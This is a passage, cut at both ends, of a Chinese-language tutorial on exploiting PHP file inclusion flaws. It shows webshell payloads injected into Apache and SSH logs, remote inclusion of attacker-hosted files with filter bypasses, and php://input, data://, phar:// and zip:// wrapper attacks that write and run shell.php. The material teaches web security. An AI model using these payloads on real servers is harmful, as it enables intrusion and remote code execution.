\/>\n\u5982\u679c\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\u662f\u9ed8\u8ba4\u4f4d\u7f6e\u6216\u8005\u662f\u53ef\u4ee5\u901a\u8fc7\u5176\u4ed6\u65b9\u6cd5\u83b7\u53d6\uff0c\u5c31\u53ef\u4ee5\u901a\u8fc7\u8bbf\u95ee\u65e5\u5fd7\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u53bb\uff0c\u7136\u540e\u901a\u8fc7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5305\u542b\u65e5\u5fd7\u4e2d\u7684\u6076\u610f\u4ee3\u7801\uff0c\u83b7\u5f97\u6743\u9650\u3002<br 
\/>\n\u5178\u578b\u7684\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n<ul>\n<li>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/li>\n<li>ssh\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/li>\n<\/ul>\n<h2>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h2>\n<p>\u5229\u7528\u6761\u4ef6\uff1a<\/p>\n<ul>\n<li>web\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u7684\u5b58\u50a8\u4f4d\u7f6e\u5df2\u77e5\uff0c\u5e76\u4e14\u5177\u6709\u53ef\u8bfb\u6743\u9650<\/li>\n<\/ul>\n<p>\u4e0b\u9762\u5f00\u59cb\u4ecb\u7ecd\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u5229\u7528\u6b65\u9aa4<\/p>\n<h3>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u4e2d\u95f4\u4ef6\u5f00\u542f\u4e86\u8bbf\u95ee\u65e5\u5fd7\u8bb0\u5f55\u529f\u80fd\uff0c\u4f1a\u8bbf\u95ee\u65e5\u5fd7\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u3002<br \/>\n\u5047\u8bbe\u8bbf\u95eeURL\uff1a<a href=\"http:\/\/192.168.1.2\/xxx\/index.php\" target=\"_blank\"  rel=\"nofollow\" >http:\/\/192.168.1.2\/xxx\/index.php<\/a><br \/>\n\u53d1\u73b0\u4f1a\u5728\u65e5\u5fd7\u6587\u4ef6\u4e2d\u6709\u5982\u4e0b\u5185\u5bb9\uff1a<\/p>\n<pre><code class=\"language-csharp\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:31:20 +0800] &quot;GET \/xxx\/index.php HTTP\/1.1&quot; 200 86....<\/code><\/pre>\n<p>\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u8bbf\u95ee\u4f1a\u8bb0\u5f55\u8bbf\u95ee\u8005\u7684IP\u5730\u5740\u3001\u8bbf\u95ee\u65f6\u95f4\u3001\u8bbf\u95ee\u8def\u5f84\u3001\u8fd4\u56de\u72b6\u6001\u7801\u7b49\u7b49\u3002<br \/>\n\u5229\u7528\u4e2d\u95f4\u4ef6\u8bbf\u95ee\u8bb0\u5f55\u8def\u5f84\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u7684\u529f\u80fd\uff0c\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u5f53\u4e2d\u53bb\uff1a<br \/>\n\u6dfb\u52a0\u6076\u610f\u4ee3\u7801\uff1a<code>http:\/\/www.abc.com\/xxx\/&lt;?php @eval($_POST[123]);?&gt;<\/code><br \/>\n\u6b64\u65f6\u4f1a\u63d0\u793a404\uff0c\u4f46\u662f\u4e0d\u6025<br 
\/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\uff0c\u53d1\u73b0\u5df2\u7ecf\u5c06\u5185\u5bb9\u5199\u5165<\/p>\n<pre><code class=\"language-perl\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:35:23 +0800] &quot;GET \/xxx\/%3C?php @eval($_POST[123]);?%3E HTTP\/1.1&quot; 404 826....<\/code><\/pre>\n<p>\u867d\u7136\u5df2\u7ecf\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6\u4e2d\u53bb\u4e86\uff0c\u4f46\u662f\u6d4f\u89c8\u5668\u8fdb\u884c\u4e86URL\u7f16\u7801\uff0c\u5bfc\u81f4\u4f20\u5165\u7684\u4ee3\u7801\u4e0d\u80fd\u6b63\u5e38\u4f7f\u7528<br \/>\n<strong>\u53ef\u4ee5\u901a\u8fc7burpsuite\u6293\u5305\u7684\u65b9\u5f0f\u5199\u5165\u6076\u610f\u4ee3\u7801\uff0c\u8fd9\u6837\u4e0d\u4f1a\u88ab\u6d4f\u89c8\u5668\u8fdb\u884cURL\u7f16\u7801<\/strong><br \/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\uff0c\u5185\u5bb9\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">[root@aaa]#less \/var\/log\/httpd\/access_log\n192.168.1.200 - - [09\/Aug\/2021:19:37:33 +0800] &quot;GET \/xxx\/&lt;?php @eval($_POST[123]);?&gt; HTTP\/1.1&quot; 404 302....<\/code><\/pre>\n<p>\u6076\u610f\u4ee3\u7801\u6210\u529f\u5199\u5165<\/p>\n<h3>\u6587\u4ef6\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u8981\u6267\u884c\u6587\u4ef6\u5305\u542b\uff0c\u5fc5\u987b\u8981\u77e5\u9053\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\u3002<br \/>\n\u5e38\u89c1\u7684\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u90fd\u6709\u9ed8\u8ba4\u7684\u5b58\u50a8\u8def\u5f84\uff0c\u6bd4\u5982Apache\u7684\u4e2d\u95f4\u4ef6\u65e5\u5fd7\u6587\u4ef6\u5b58\u5728\/var\/log\/httpd\/\u76ee\u5f55\u4e0b\uff0c\u6587\u4ef6\u540d\u53ebaccess_log\uff08Debian\/Ubuntu\u4e0a\u4e3a\/var\/log\/apache2\/access.log\uff1b\u8bb8\u591a\u53d1\u884c\u7248\u9ed8\u8ba4\u65e5\u5fd7\u4ec5root\u53ef\u8bfb\uff0cWeb\u8fdb\u7a0b\u65e0\u6cd5\u5305\u542b\uff09<br \/>\n\u8f93\u5165\u6d4b\u8bd5\u8bed\u53e5<code>http:\/\/www.abc.com\/xxx\/file.php?file=..\/..\/..\/var\/log\/httpd\/access_log<\/code><br \/>\n\u4e4b\u540e\u518d\u5411\u7f51\u9875\u4f20\u5165POST\u53c2\u6570\uff1a<code>123=phpinfo();<\/code>\uff08eval\u9700\u8981\u5b8c\u6574\u7684PHP\u8bed\u53e5\uff0c\u5fc5\u987b\u5e26\u62ec\u53f7\u548c\u5206\u53f7\uff09<br 
\/>\n\u5373\u53ef\u663e\u793a\u51faphpinfo\u7684\u5185\u5bb9<\/p>\n<h2>SSH\u65e5\u5fd7\u6587\u4ef6\u5305\u542b<\/h2>\n<p>SSH\u65e5\u5fd7\u6587\u4ef6\u5305\u542b\u7684\u5229\u7528\u6761\u4ef6\u662f\uff1a<\/p>\n<ul>\n<li>SSH\u65e5\u5fd7\u8def\u5f84\u5df2\u77e5\uff0c\u5e76\u4e14\u5177\u6709\u53ef\u8bfb\u6743\u9650<\/li>\n<\/ul>\n<p>SSH\u65e5\u5fd7\u6587\u4ef6\u7684\u9ed8\u8ba4\u8def\u5f84\u4e3a<code>\/var\/log\/auth.log<\/code>\uff08Debian\/Ubuntu\uff1bRHEL\/CentOS\u4e3a\/var\/log\/secure\uff0c\u4e14\u901a\u5e38\u4ec5root\u6216adm\u7ec4\u53ef\u8bfb\uff09<\/p>\n<p>\u4e0b\u9762\u4ecb\u7ecd\u6f0f\u6d1e\u5229\u7528\u6b65\u9aa4<\/p>\n<h3>\u5c06\u6076\u610f\u4ee3\u7801\u5199\u5165\u6587\u4ef6<\/h3>\n<p>SSH\u5982\u679c\u5f00\u542f\u4e86\u65e5\u5fd7\u8bb0\u5f55\u7684\u529f\u80fd\uff0c\u90a3\u4e48\u4f1a\u5c06ssh\u7684\u8fde\u63a5\u65e5\u5fd7\u8bb0\u5f55\u5230ssh\u65e5\u5fd7\u6587\u4ef6\u5f53\u4e2d<br \/>\n\u5c06\u8fde\u63a5\u7684\u7528\u6237\u540d\u8bbe\u7f6e\u6210\u6076\u610f\u4ee3\u7801\uff0c\u7528\u547d\u4ee4\u8fde\u63a5\u670d\u52a1\u5668192.168.1.1\u7684ssh\u670d\u52a1<br \/>\n<code>ssh &quot;&lt;?php @eval($_POST[123]);?&gt;&quot;@192.168.1.1<\/code><br \/>\n\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\/var\/log\/auth.log\uff0c\u53ef\u4ee5\u89c2\u5bdf\u5230\u6076\u610f\u4ee3\u7801\u5df2\u7ecf\u5199\u5165\u5230\u65e5\u5fd7\u6587\u4ef6<\/p>\n<h3>\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u65e5\u5fd7\u6587\u4ef6<\/h3>\n<p>\u6d4b\u8bd5\u8f93\u5165\u8bed\u53e5\uff1a<code>http:\/\/192.168.1.1\/xxx\/file.php?file=..\/..\/..\/var\/log\/auth.log<\/code><br \/>\n\u4e4b\u540e\u518d\u5411\u7f51\u9875\u4f20\u5165POST\u53c2\u6570\uff1a<code>123=phpinfo();<\/code><br 
\/>\n\u5c31\u53ef\u4ee5\u51fa\u73b0phpinfo\u7684\u5185\u5bb9\u4e86<\/p>\n<h2>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h2>\n<h3>\u65e0\u9650\u5236\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h3>\n<p>\u65e0\u9650\u5236\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u662f\u6307\u5305\u542b\u6587\u4ef6\u7684\u4f4d\u7f6e\u5e76\u4e0d\u5728\u672c\u5730\u670d\u52a1\u5668\uff0c\u800c\u662f\u901a\u8fc7URL\u7684\u5f62\u5f0f\u5305\u542b\u5230\u5176\u4ed6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\uff0c\u4ee5\u53ca\u6267\u884c\u6587\u4ef6\u4e2d\u7684\u6076\u610f\u4ee3\u7801<br \/>\n\u6f0f\u6d1e\u5229\u7528\u7684\u6761\u4ef6\u662f\uff1a<\/p>\n<pre><code class=\"language-ini\">allow_url_fopen=on\nallow_url_include=on<\/code><\/pre>\n<p>\u65e0\u9650\u8fdc\u7a0b\u6267\u884c\u6587\u4ef6\u7684\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include $file;\n?&gt;<\/code><\/pre>\n<p>\u8bbe\u5b9a\u4e00\u4e2a\u6587\u4ef6\uff1aphp.txt \u7684\u5185\u5bb9\u4e3a<code>&lt;?php phpinfo();?&gt;<\/code><br \/>\n\u5728\u6b63\u5e38\u60c5\u51b5\u4e0b\u8bbf\u95ee\u8fdc\u7a0b\u670d\u52a1\u5668URL\uff0c<code>http:\/\/192.168.2.1\/php.txt<\/code><br \/>\n\u5305\u542b\u5728php.txt\u4e2d\u7684phpinfo\u51fd\u6570\u4e0d\u4f1a\u5f53\u505aPHP\u4ee3\u7801\u6267\u884c\uff0c\u4f46\u662f\u901a\u8fc7\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5305\u542b\u5728php.txt\u7684phpinfo\u51fd\u6570\u4f1a\u88ab\u5f53\u505aPHP\u4ee3\u7801\u6267\u884c<br \/>\n<code>http:\/\/www.abc.com\/file.php?file=http:\/\/192.168.2.1\/php.txt<\/code><\/p>\n<h3>\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/h3>\n<p>\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u662f\u4ee3\u7801\u4e2d\u5b58\u5728\u7279\u5b9a\u7684\u524d\u7f00\u548c\u540e\u7f00.php \/.html 
\u7b49\u62d3\u5c55\u540d\u8fc7\u6ee4\u7684\u65f6\u5019\uff0c\u653b\u51fb\u8005\u9700\u8981\u7ed5\u8fc7\u524d\u7f00\u6216\u8005\u62d3\u5c55\u540d\u8fc7\u6ee4\uff0c\u624d\u80fd\u8fdc\u7a0b\u6267\u884cURL\u4ee3\u7801<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">    include($_GET[&#039;filename&#039;].&quot;.html&quot;);<\/code><\/pre>\n<p>\u901a\u5e38\u6709\u9650\u5236\u7684\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u53ef\u4ee5\u901a\u8fc7\u95ee\u53f7\u3001\u4e95\u53f7\u3001\u7a7a\u683c\u7ed5\u8fc7<\/p>\n<h4>\u901a\u8fc7\u95ee\u53f7\u7ed5\u8fc7<\/h4>\n<p>\u53ef\u4ee5\u5728\u95ee\u53f7\u540e\u9762\u6dfb\u52a0html\u5b57\u7b26\u4e32\uff0c\u95ee\u53f7\u540e\u9762\u7684\u62d3\u5c55\u540d\u4f1a\u88ab\u5f53\u505a\u67e5\u8be2\uff0c\u4ece\u800c\u7ed5\u8fc7\u8fc7\u6ee4<br \/>\n<code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt?<\/code><\/p>\n<h4>\u901a\u8fc7\u4e95\u53f7\u7ed5\u8fc7<\/h4>\n<p>\u53ef\u4ee5\u5728#\u540e\u9762\u6dfb\u52a0HTML\u5b57\u7b26\u4e32\uff0c#\u4f1a\u622a\u65ad\u540e\u9762\u7684\u62d3\u5c55\u540d\uff0c\u4ece\u800c\u7ed5\u8fc7\u62d3\u5c55\u540d\u8fc7\u6ee4.#\u7684URL\u7f16\u7801\u4e3a%23<br \/>\n<code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt%23<\/code><\/p>\n<h4>\u901a\u8fc7\u7a7a\u683c\u7ed5\u8fc7<\/h4>\n<pre><code>http:\/\/www.abc.com\/file.php?filename=http:\/\/192.168.2.1\/php.txt%20<\/code><\/pre>\n<h1>PHP \u4f2a\u534f\u8bae<\/h1>\n<p>PHP\u5e26\u6709\u5f88\u591a\u5185\u7f6e\u7684URL\u98ce\u683c\u7684\u5c01\u88c5\u534f\u8bae\uff0c\u53ef\u7528\u4e8e fopen\\copy\\file_exists\\filesize\u7b49\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570<br \/>\n\u5e38\u89c1\u7684PHP\u4f2a\u534f\u8bae\u5982\u4e0b\uff1a<\/p>\n<ul>\n<li>file:\/\/ \u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf<\/li>\n<li>http:\/\/ \u8bbf\u95eehttp\uff08s\uff09\u7f51\u5740<\/li>\n<li>ftp:\/\/ \u8bbf\u95eeftp\uff08s)URL<\/li>\n<li>php:\/\/ \u8bbf\u95ee\u5404\u4e2a\u8f93\u5165\u8f93\u51fa\u6d41<\/li>\n<li>zlib:\/\/ 
\u5904\u7406\u538b\u7f29\u6d41<\/li>\n<li>data:\/\/ \u8bfb\u53d6\u6570\u636e<\/li>\n<li>glob:\/\/ \u627e\u67e5\u5339\u914d\u7684\u6587\u4ef6\u8def\u5f84\u6a21\u5f0f<\/li>\n<li>phar:\/\/ PHP\u5f52\u6863<\/li>\n<li>ssh2:\/\/ Secure Shell 2<\/li>\n<li>rar:\/\/ RAR\u5904\u7406\u538b\u7f29\u6570\u636e<\/li>\n<li>ogg:\/\/ \u5904\u7406\u97f3\u9891\u6d41<\/li>\n<li>expect:\/\/ \u5904\u7406\u4ea4\u4e92\u5f0f\u7684\u6d41<\/li>\n<\/ul>\n<h2>php:\/\/\u4f2a\u534f\u8bae<\/h2>\n<h3>php:\/\/filter<\/h3>\n<p>php:\/\/filter \u662f\u5143\u5c01\u88c5\u5668\uff0c\u8bbe\u8ba1\u7528\u4e8e\u6570\u636e\u6d41\u6253\u5f00\u65f6\u7b5b\u9009\u8fc7\u6ee4\u5e94\u7528\uff0c\u5bf9\u672c\u5730\u78c1\u76d8\u6587\u4ef6\u8fdb\u884c\u8bfb\u5199<br \/>\n\u4ee5\u4e0b\u4e24\u79cd\u7528\u6cd5\u76f8\u540c<br \/>\n<code>?filename=php:\/\/filter\/read=convert.base64-encode\/resource=xxx.php<\/code><br \/>\n<code>?filename=php:\/\/filter\/convert.base64-encode\/resource=xxx.php<\/code><br \/>\n\u4f7f\u7528php:\/\/filter allow_url_fopen\u548callow_url_include\u4e0d\u9700\u8981\u5f00\u542f<\/p>\n<table>\n<thead>\n<tr>\n<th>\u524d\u7f00\u540d\u79f0<\/th>\n<th>\u540e\u52a0\u5185\u5bb9<\/th>\n<th>\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>resource=<\/td>\n<td>\u8981\u8fc7\u6ee4\u7684\u6570\u636e\u6d41<\/td>\n<td>\u6307\u5b9a\u8981\u8fc7\u6ee4\u7684\u6570\u636e\u6d41<\/td>\n<\/tr>\n<tr>\n<td>read=<\/td>\n<td>\u8bfb\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td>\n<td>\u53c2\u6570\u53ef\u9009\uff0c\u53ef\u8bbe\u5b9a\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u7b5b\u9009\u5668\u540d\u79f0\uff0c\u4ee5\u7ba1\u9053\u7b26\uff08|\uff09\u5206\u9694<\/td>\n<\/tr>\n<tr>\n<td>write=<\/td>\n<td>\u5199\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td>\n<td>\u53c2\u6570\u53ef\u9009\uff0c\u53ef\u8bbe\u5b9a\u4e00\u4e2a\u6216\u8005\u591a\u4e2a\u7b5b\u9009\u5668\u540d\u79f0\uff0c\u4ee5\u7ba1\u9053\u7b26\uff08|\uff09\u5206\u9694<\/td>\n<\/tr>\n<tr>\n<td>\u7a7a<\/td>\n<td>\u4e24\u4e2a\u94fe\u7684\u7b5b\u9009\u5668\u5217\u8868<\/td
>\n<td>\u6ca1\u6709\u7528read=\u6216\u8005write=\u505a\u524d\u7f00\u7684\u7b5b\u9009\u5668\u5217\u8868\u4f1a\u662f\u8f7b\u5feb\u5e94\u7528\u4e8e\u8bfb\u6216\u8005\u5199<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u8fd9\u6837\u6587\u4ef6\u4f1a\u4ee5base64\u7684\u7f16\u7801\u6253\u5f00\uff0c\u4f7f\u7528python\u89e3\u7801\u5373\u53ef<\/p>\n<pre><code class=\"language-python\">import base64\nprint(base64.b64decode(&quot;.........&quot;))<\/code><\/pre>\n<h3>php:\/\/input<\/h3>\n<p>php:\/\/input\u53ef\u4ee5\u8bbf\u95ee\u8bf7\u6c42\u7684\u539f\u59cb\u6570\u636e\u7684\u53ea\u8bfb\u6d41\uff0c\u5373\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6POST\u4e0a\u6ca1\u6709\u7ecf\u8fc7\u89e3\u6790\u7684\u539f\u59cb\u6570\u636e\uff0c\u4f46\u662f\u4f7f\u7528enctype=&quot;multipart\/form-data&quot;\u7684\u65f6\u5019php:\/\/input\u662f\u65e0\u6548\u7684\u3002<br \/>\nphp:\/\/input\u6709\u4ee5\u4e0b\u4e09\u79cd\u7528\u6cd5<\/p>\n<h4>\u8bfb\u53d6POST\u6570\u636e<\/h4>\n<p>php:\/\/input\u53ef\u4ee5\u8bfb\u53d6POST\u4e0a\u6ca1\u6709\u7ecf\u8fc7\u89e3\u6790\u7684\u539f\u59cb\u6570\u636e<br \/>\n\u5229\u7528php:\/\/input \u8bfb\u53d6POST\u6570\u636e\u7684\u65f6\u5019\uff0callow_url_fopen\u548callow_url_include\u4e0d\u9700\u8981\u5f00\u542f<br \/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b<\/p>\n<pre><code class=\"language-php\">    echo file_get_contents(&quot;php:\/\/input&quot;);<\/code><\/pre>\n<p>\u4e0a\u9762\u4ee3\u7801\u8f93\u51fafile_get_contents\u51fd\u6570\u83b7\u53d6\u7684php:\/\/input\u6570\u636e\u3002<br \/>\n\u6d4b\u8bd5\u65f6\u4f20\u5165POST\u6570\u636e\u5b57\u7b26\u4e32test<br \/>\n\u6700\u540e\u4f1a\u5728\u9875\u9762\u56de\u663e\u51fatest<\/p>\n<h4>\u5199\u5165\u6728\u9a6c<\/h4>\n<p>\u5229\u7528php:\/\/input\u5199\u5165\u6728\u9a6c\u7684\u65f6\u5019\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u53ea\u9700\u8981\u5f00\u542fallow_url_include<br \/>\n\u5982\u679cPOST\u4f20\u5165\u7684\u662fPHP\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u5199\u5165\u6728\u9a6c<br 
\/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5982\u679cPOST\u4f20\u5165\u7684\u662f\u4e00\u4e2a\u6267\u884c\u5199\u5165\u6728\u9a6c\u7684PHP\u4ee3\u7801\uff0c\u5c31\u4f1a\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u5199\u5165\u4e00\u4e2a\u6728\u9a6c\uff0c\u901a\u8fc7POST\u65b9\u6cd5\u4f20\u5165\u7684\u662f\u4ee5\u4e0b\u4ee3\u7801<br \/>\n<code>&lt;?php fputs(fopen(&#039;shell.php&#039;,&#039;w&#039;),&#039;&lt;?php @eval($_POST[cmd])?&gt;&#039;);?&gt;<\/code><br \/>\n\u5229\u7528php:\/\/input\u4f20\u5165\u6728\u9a6c\u7684PHP\u4ee3\u7801<br \/>\n<code>http&quot;\/\/www.abc.com\/xxx\/file.php?file=php:\/\/input<\/code><br \/>\n\u6d4b\u8bd5\u7684\u7ed3\u679c\u5c31\u662f\u901a\u8fc7php:\/\/input\u4f20\u5165\u4e86\u8fd9\u4e2a\u4ee3\u7801\uff0c\u5e76\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u5efa\u7acb\u4e86shell.php\u6587\u4ef6<\/p>\n<h4>\u6267\u884c\u547d\u4ee4<\/h4>\n<p>\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5229\u7528php:\/\/input\u6267\u884c\u547d\u4ee4\u7684\u65f6\u5019\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u53ea\u9700\u8981\u5f00\u542fallow_url_include<br \/>\n\u5982\u679cPOST\u4f20\u5165\u7684\u662fPHP\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5982\u679c\u6b64\u65f6PHP\u4ee3\u7801\u8c03\u7528\u4e86\u7cfb\u7edf\u51fd\u6570\uff0c\u5c31\u53ef\u4ee5\u6267\u884c\u8be5\u547d\u4ee4<br \/>\n\u6bd4\u5982\u4f20\u5165POST\u53c2\u6570<br \/>\n<code>&lt;?php system(&#039;ls&#039;);?&gt;<\/code><\/p>\n<h2>file: \/\/\u4f2a\u534f\u8bae<\/h2>\n<p>file:\/\/ \u53ef\u4ee5\u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\uff0c\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u7684\u5185\u5bb9<br \/>\n\u4f7f\u7528file:\/\/ \u4e0d\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include<br 
\/>\n\u793a\u4f8b\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u53ef\u4ee5\u8f93\u5165\u4ee5\u4e0bURL<br \/>\n<code>http:\/\/www.abc.com\/xxx\/file.php?file=file:\/\/c:\/boot.ini<\/code><br \/>\n\u8fd9\u4e2a\u547d\u4ee4\u5c31\u53ef\u4ee5\u8d77\u5230\u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7684\u76ee\u7684<\/p>\n<h2>data:\/\/ \u4f2a\u534f\u8bae<\/h2>\n<p>\u4ecePHP5.2.0\u8d77\uff0c\u6570\u636e\u5c01\u88c5\u6d41\u5c31\u5f00\u59cb\u6709\u6548\uff0c\u7528\u4e8e\u6570\u636e\u6d41\u7684\u8bfb\u53d6\u3002<br \/>\n\u5982\u679c\u4f20\u5165\u7684\u90fd\u662fPHP\u4ee3\u7801\uff0c\u5c31\u4f1a\u6267\u884c\u4efb\u610f\u4ee3\u7801<br \/>\n\u4f7f\u7528\u65b9\u6cd5\u5982\u4e0b<br \/>\n<code>data:\/\/text\/plain;base64,xxxxx(base64\u7f16\u7801\u540e\u7684\u6570\u636e)<\/code><br \/>\n<strong>\u5229\u7528data:\/\/ \u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include<\/strong><br \/>\n\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u901a\u8fc7data:\/\/ \u4f2a\u534f\u8bae\u4f20\u9001phpinfo\u4ee3\u7801\uff0c<code>&lt;?php phpinfo();?&gt;<\/code>\u7684base64\u7f16\u7801\u4e3aPD9waHAgcGhwaW5mbygpOz8+\uff0c\u9700\u8981\u5bf9\u52a0\u53f7\u8fdb\u884cURL\u7f16\u7801\uff1a%2b<br \/>\n\u6700\u7ec8\u8f93\u5165\u7684data\u6570\u636e\u662f\uff1a<br \/>\n<code>data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/code><br \/>\n\u4f20\u5165\u5230URL\u5c31\u662f<br \/>\n<code>http:\/\/www.abc.com\/xxx\/file.php?file=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b<\/code><\/p>\n<h2>phar:\/\/\u4f2a\u534f\u8bae<\/h2>\n<p>phar:\/\/ \u662f\u7528\u6765\u89e3\u538b\u7684\u4f2a\u534f\u8bae<br 
\/>\nphar:\/\/\u4e0d\u7ba1\u53c2\u6570\u4e2d\u662f\u4ec0\u4e48\u62d3\u5c55\u540d\uff0c\u90fd\u4f1a\u88ab\u5f53\u505a\u538b\u7f29\u5305<br \/>\n\u7528\u6cd5\uff1a<code>?file=phar:\/\/\u538b\u7f29\u5305\/\u538b\u7f29\u6587\u4ef6<\/code><br \/>\n\u6bd4\u5982\uff1a<code>phar:\/\/xxx.png\/shell.php<\/code><br \/>\n<strong>\u5229\u7528phar:\/\/ \u65f6\uff0cPHP\u914d\u7f6e\u6587\u4ef6\u9700\u8981\u5f00\u542fallow_url_fopen\u548callow_url_include\uff0c\u5e76\u4e14PHP\u7248\u672c\u8981\u9ad8\u4e8e5.3.0<\/strong><\/p>\n<blockquote>\n<p>\u6ce8\u610f\uff1a\u538b\u7f29\u5305\u9700\u8981\u7528zip:\/\/\u4f2a\u534f\u8bae\u538b\u7f29\u800c\u4e0d\u80fd\u7528rar:\/\/\uff0c\u5c06\u6728\u9a6c\u6587\u4ef6\u538b\u7f29\u540e\uff0c\u6539\u6210\u4efb\u610f\u540e\u7f00\u540d\u90fd\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528<\/p>\n<\/blockquote>\n<p>\u4ee3\u7801\u793a\u4f8b\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    $file=$_GET[&#039;file&#039;];\n    include($file);\n?&gt;<\/code><\/pre>\n<p>\u5199\u4e00\u4e2a\u6728\u9a6c\u6587\u4ef6shell.php\uff0c\u7136\u540e\u7528zip:\/\/\u4f2a\u534f\u8bae\u538b\u7f29\u6210shell.zip\uff0c\u6700\u540e\u4fee\u6539\u540e\u7f00\u540d\u4e3a.png\uff0c\u4e0a\u4f20\u56fe\u7247<br \/>\n\u8f93\u5165\u6d4b\u8bd5\uff1a<code>http:\/\/www.abc.com\/xxx\/file.php?file=phar:\/\/shell.png\/shell.php<\/code><\/p>\n<p>\u8fd9\u6837phar:\/\/\u5c31\u4f1a\u5c06png\u5f53\u505azip\u538b\u7f29\u5305\u8fdb\u884c\u89e3\u538b\uff0c\u5e76\u4e14\u8bbf\u95ee\u89e3\u538b\u540e\u7684shell.php\u6587\u4ef6<\/p>\n<h2>zip:\/\/ \u4f2a\u534f\u8bae<\/h2>\n<p>\u548cphar:\/\/\u4f2a\u534f\u8bae\u539f\u7406\u7c7b\u4f3c\uff0c\u4f46\u7528\u6cd5\u4e0d\u540c<br \/>\n\u7528\u6cd5\uff1a<code>?file=zip:\/\/[\u538b\u7f29\u6587\u4ef6\u7edd\u5bf9\u8def\u5f84]#[\u538b\u7f29\u6587\u4ef6\u5185\u7684\u5b50\u6587\u4ef6\u540d]<\/code><br \/>\n<strong>\u5229\u7528zip:\/\/ 
